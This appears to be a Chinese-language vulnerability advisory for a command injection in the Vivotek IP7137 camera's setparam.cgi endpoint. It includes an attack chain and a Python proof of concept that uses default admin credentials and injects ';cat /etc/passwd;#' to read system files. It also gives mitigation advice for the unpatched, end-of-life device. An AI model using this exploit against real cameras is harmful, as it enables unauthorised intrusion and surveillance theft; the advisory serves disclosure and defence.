CVE-2025-66052 CVSS 7.2 高危

CVE-2025-66052 Vivotek IP7137摄像头system_ntpIt参数命令注入漏洞

披露日期: 2026-01-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-66052

漏洞类型

命令注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Vivotek IP7137 camera

漏洞概述

Vivotek IP7137摄像头存在命令注入漏洞，攻击者可通过未正确过滤的system_ntpIt参数在受影响设备上执行任意命令。该漏洞存在于/cgi-bin/admin/setparam.cgi端点，攻击者需要具备管理员权限。由于CVE-2025-66050的存在，管理员访问权限在默认情况下未受保护，进一步降低了攻击门槛。该产品已到达生命周期终点，厂商不会发布修复补丁，所有固件版本可能均受影响。

技术细节

Vivotek IP7137摄像头固件0200a版本中的/cgi-bin/admin/setparam.cgi端点存在命令注入漏洞。漏洞源于system_ntpIt参数未进行充分的输入过滤和清理，攻击者可通过构造恶意Payload注入系统命令。由于该参数直接参与NTP服务器配置，攻击者可利用分号、反引号或管道等shell元字符插入额外命令。结合CVE-2025-66050（管理员访问控制缺失），攻击者可直接获取管理员权限后利用此漏洞执行任意系统命令，包括但不限于开启后门、窃取视频流数据、进行内网渗透等。攻击者可通过HTTP POST请求发送精心构造的参数值实现命令注入，无需用户交互。

攻击链分析

STEP 1

步骤1

利用CVE-2025-66050获取管理员访问权限或使用默认管理员凭据登录摄像头管理界面

STEP 2

步骤2

构造包含恶意命令的system_ntpIt参数Payload，利用shell元字符(;,`,|等)注入命令

STEP 3

步骤3

向/cgi-bin/admin/setparam.cgi端点发送HTTP POST请求，参数中包含注入的命令

STEP 4

步骤4

设备以root权限执行注入的命令，攻击者可在设备上执行任意系统操作

STEP 5

步骤5

攻击者可建立持久化后门、窃取视频流数据或横向移动到内网其他设备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-66052 PoC - Vivotek IP7137 Command Injection
# Target: Vivotek IP7137 IP Camera
# Endpoint: /cgi-bin/admin/setparam.cgi
# Parameter: system_ntpIt
# Authentication: Requires admin privileges

target_ip = "192.168.1.100"
url = f"http://{target_ip}/cgi-bin/admin/setparam.cgi"

# Authentication headers (admin:admin default or via CVE-2025-66050)
headers = {
    "Authorization": "Basic YWRtaW46YWRtaW4=",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Malicious payload - injects command via system_ntpIt parameter
# Example: Execute reverse shell or read /etc/passwd
payload = {
    "system_ntpIt": ";cat /etc/passwd;#"
}

try:
    response = requests.post(url, data=payload, headers=headers, timeout=10)
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Error: {e}")

影响范围

Vivotek IP7137 firmware 0200a

Vivotek IP7137 all firmware versions (possibly)

防御指南

临时缓解措施

由于Vivotek IP7137已到达产品生命周期终点且厂商未回应，官方不会发布安全更新。建议立即将设备从网络中断开或更换为仍在支持期的安全摄像头产品。若暂时无法更换，应将设备部署在独立VLAN中，严格限制管理访问，仅允许通过VPN或受信任IP段访问，并持续监控设备行为异常。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66052
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66052
3 Details https://www.cvedetails.com/cve/CVE-2025-66052/
4 VulDB https://vuldb.com/cve/CVE-2025-66052
5 Link https://cert.pl/posts/2026/01/CVE-2025-66049

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表